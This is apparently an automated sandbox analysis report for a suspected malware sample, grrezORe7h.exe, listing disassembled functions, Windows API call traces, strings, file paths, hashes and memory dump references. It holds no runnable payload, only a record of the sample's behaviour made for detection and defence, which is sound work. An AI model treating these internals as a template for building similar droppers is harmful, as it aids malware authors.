Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D

Non-executed Functions

Function 004052F3 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405351
GetDlgItem.USER32(?,000003EE), ref: 00405360
GetClientRect.USER32(?,?), ref: 0040539D
GetSystemMetrics.USER32(00000002), ref: 004053A4
SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
ShowWindow.USER32(?,00000008), ref: 00405440
GetDlgItem.USER32(?,000003EC), ref: 00405461
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
GetDlgItem.USER32(?,000003F8), ref: 0040536F

Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C

GetDlgItem.USER32(?,000003EC), ref: 004054B3
CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
CloseHandle.KERNEL32(00000000), ref: 004054C8
ShowWindow.USER32(00000000), ref: 004054EC
ShowWindow.USER32(?,00000008), ref: 004054F1
ShowWindow.USER32(00000008), ref: 0040553B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
CreatePopupMenu.USER32 ref: 00405580
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
GetWindowRect.USER32(?,?), ref: 004055B4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
OpenClipboard.USER32(00000000), ref: 00405615
EmptyClipboard.USER32 ref: 0040561B
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
GlobalLock.KERNEL32(00000000), ref: 00405631
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
GlobalUnlock.KERNEL32(00000000), ref: 00405665
SetClipboardData.USER32(0000000D,00000000), ref: 00405670
CloseClipboard.USER32 ref: 00405676

Strings

{, xrefs: 00405559

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58

Function 004045B4 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404603
SetWindowTextW.USER32(00000000,?), ref: 0040462D
SHBrowseForFolderW.SHELL32(?), ref: 004046DE
CoTaskMemFree.OLE32(00000000), ref: 004046E9
lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
lstrcatW.KERNEL32(?,Call), ref: 00404727
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739

Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791

Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\grrezORe7h.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\grrezORe7h.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817

Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D

Strings

Call, xrefs: 00404715, 0040471A, 00404725
A, xrefs: 004046D7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 00404704

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
API String ID: 2624150263-3131679198
Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69

Function 0040686A Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04

Function 00407041 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95

Function 004042B6 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
GetDlgItem.USER32(?,000003E8), ref: 00404368
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
GetSysColor.USER32(?), ref: 00404396
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
lstrlenW.KERNEL32(?), ref: 004043B7
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
GetDlgItem.USER32(?,0000040A), ref: 00404432
SendMessageW.USER32(00000000), ref: 00404439
GetDlgItem.USER32(?,000003E8), ref: 00404464
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
SetCursor.USER32(00000000), ref: 004044B8
ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
SetCursor.USER32(00000000), ref: 004044DC
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D

Strings

-B@, xrefs: 004044C2
N, xrefs: 00404452
Call, xrefs: 00404493
open, xrefs: 004044C5

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: -B@$Call$N$open
API String ID: 3615053054-1446803726
Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4

Function 00405D84 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0

Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1

GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
wsprintfA.USER32 ref: 00405DFB
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
GlobalFree.KERNEL32(00000000), ref: 00405EE4
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB

Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\grrezORe7h.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

Strings

%ls=%ls, xrefs: 00405DF1
[Rename], xrefs: 00405E65, 00405E77
NUL, xrefs: 00405D8D

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD

Function 100022D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 10002416

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Strings

@Hmu, xrefs: 100023CB

Memory Dump Source

Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID: @Hmu
API String ID: 4216380887-887474944
Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61

Function 004062E9 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\grrezORe7h.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
CharNextW.USER32(0040A300,"C:\Users\user\Desktop\grrezORe7h.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
"C:\Users\user\Desktop\grrezORe7h.exe", xrefs: 0040632D
*?|<>/":, xrefs: 0040633B

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\grrezORe7h.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3473373631
Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED

Function 00404180 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040419D
GetSysColor.USER32(00000000), ref: 004041B9
SetTextColor.GDI32(?,00000000), ref: 004041C5
SetBkMode.GDI32(?,?), ref: 004041D1
GetSysColor.USER32(?), ref: 004041E4
SetBkColor.GDI32(?,?), ref: 004041F4
DeleteObject.GDI32(?), ref: 0040420E
CreateBrushIndirect.GDI32(?), ref: 00404218

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64

Function 004051B4 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
